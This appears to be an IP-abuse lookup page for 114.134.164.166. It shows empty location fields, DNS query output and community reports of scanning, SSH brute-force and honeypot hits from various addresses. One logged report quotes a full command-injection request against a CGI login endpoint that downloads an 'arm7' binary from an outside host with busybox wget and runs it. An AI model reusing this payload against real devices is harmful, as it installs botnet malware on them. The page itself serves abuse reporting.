Must be a valid IPv4 or IPv6 ip address, e.g. 127.0.0.1 or 2001:DB8:0:0:8:800:200C:417A
Basic Info

City: unknown

Region: unknown

Country: None

Internet Service Provider: unknown

Hostname: unknown

Organization: unknown

Usage Type: unknown

Comments:
No discussion about this IP yet. Click above link to make one.
Comments on same subnet:
IP Type Details Datetime
114.134.164.222 attackbotsspam
400 BAD REQUEST
2020-04-27 19:10:20
114.134.164.222 attack
/cgi-bin/mainfunction.cgi%3Faction=login%26keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://192.3.45.185/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27%26loginUser=a%26loginPwd=a
2020-04-05 02:27:08
Whois info:
b
Dig info:
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 114.134.164.166
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 55827
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;114.134.164.166.		IN	A

;; AUTHORITY SECTION:
.			142	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2022030400 1800 900 604800 86400

;; Query time: 16 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Sat Mar 05 03:07:46 CST 2022
;; MSG SIZE  rcvd: 108
Host info
166.164.134.114.in-addr.arpa domain name pointer 114-134-164-166.static.nztechnologygroup.com.
Nslookup info:
Server:		183.60.83.19
Address:	183.60.83.19#53

Non-authoritative answer:
166.164.134.114.in-addr.arpa	name = 114-134-164-166.static.nztechnologygroup.com.

Authoritative answers can be found from:
Related IP info:
Related comments:
IP Type Details Datetime
190.79.78.124 attack
Unauthorised access (Jul 12) SRC=190.79.78.124 LEN=52 TTL=115 ID=21679 DF TCP DPT=445 WINDOW=8192 SYN
2019-07-12 11:52:41
83.194.15.206 attack
Invalid user admin from 83.194.15.206 port 46654
2019-07-12 11:47:12
159.65.54.221 attackbotsspam
ssh failed login
2019-07-12 11:42:14
188.166.72.240 attackspambots
IP attempted unauthorised action
2019-07-12 11:53:12
46.49.125.119 attackbotsspam
Unauthorized connection attempt from IP address 46.49.125.119 on Port 445(SMB)
2019-07-12 11:18:51
90.89.20.230 attack
12.07.2019 03:44:03 SSH access blocked by firewall
2019-07-12 11:46:47
116.111.98.63 attackspambots
Invalid user admin from 116.111.98.63 port 56785
2019-07-12 12:02:15
27.8.96.123 attackspam
Honeypot hit.
2019-07-12 11:20:54
139.59.17.173 attackspam
$f2bV_matches
2019-07-12 11:43:29
114.69.244.66 attackspam
Spamassassin_114.69.244.66
2019-07-12 11:33:20
162.247.74.217 attackspambots
Jul 12 05:24:57 cp sshd[3212]: Failed password for root from 162.247.74.217 port 58884 ssh2
Jul 12 05:25:00 cp sshd[3212]: Failed password for root from 162.247.74.217 port 58884 ssh2
Jul 12 05:25:03 cp sshd[3212]: Failed password for root from 162.247.74.217 port 58884 ssh2
Jul 12 05:25:05 cp sshd[3212]: Failed password for root from 162.247.74.217 port 58884 ssh2
2019-07-12 11:32:58
206.189.166.172 attackspam
SSH bruteforce (Triggered fail2ban)
2019-07-12 11:40:21
156.199.245.166 attack
Honeypot attack, port: 23, PTR: host-156.199.166.245-static.tedata.net.
2019-07-12 11:18:22
206.189.145.152 attack
Jul 12 01:46:37 XXXXXX sshd[16866]: Invalid user eas from 206.189.145.152 port 34512
2019-07-12 11:40:53
112.84.90.149 attackbotsspam
Spamassassin_112.84.90.149
2019-07-12 11:35:30

Recently Reported IPs

114.134.169.132 114.134.168.190 114.134.166.22 114.134.170.116
90.121.252.204 114.134.184.216 114.134.172.50 114.134.184.194
114.134.170.68 114.134.170.234 114.134.184.172 115.211.231.106
114.134.184.181 114.134.184.252 114.134.186.1 115.211.231.114
114.134.170.207 114.134.184.148 102.179.50.22 114.134.184.233